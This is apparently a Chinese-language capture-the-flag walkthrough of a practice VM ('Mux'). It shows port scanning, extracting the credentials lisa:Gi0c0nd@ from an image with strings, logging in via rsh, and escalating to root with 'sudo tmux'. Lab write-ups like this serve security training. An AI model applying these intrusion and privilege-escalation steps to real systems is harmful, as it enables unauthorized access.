# 靶场搭建

下载:Mux

下载,导入,NAT,开干

IP: 192.168.1.134

# 渗透过程

# 信息初收集

80/tcp  open  http       Apache httpd 2.4.56 ((Debian))
|_http-title: Monna Lisa
|_http-server-header: Apache/2.4.56 (Debian)
512/tcp open  exec       netkit-rsh rexecd
513/tcp open  login
514/tcp open  tcpwrapped

80 端口进去一张图片,下载下来瞅一眼字符串: lisa:My_$3cUr3_RSH_p@zz

感觉有问题,这个像是提示,继续 strings,并且 grep 一下,发现 lisa:Gi0c0nd@

┌──(root㉿kali)-[~]
└─# strings image.jpg | grep lisa
lisa:My_$3cUr3_RSH_p@zz
lisa:Gi0c0nd@

那应该这个就是密码了

开了 514 端口那就是 rsh 服务了,有账号密码就直接登录

┌──(root㉿kali)-[~]
└─# rsh 192.168.1.134 -l lisa
Password:

# 提权

sudo 看到有 tmux 程序

直接 sudo tmux 拿到 root 权限

# 小结

Rsh(远程 shell)是一种基于文本的远程登录协议,可用于在网络上执行命令。由于其不加密的特性,Rsh 协议容易受到中间人攻击。

垃圾协议,之前打 metasploitable2 靶场也有这个,那个是错误配置成了无需验证。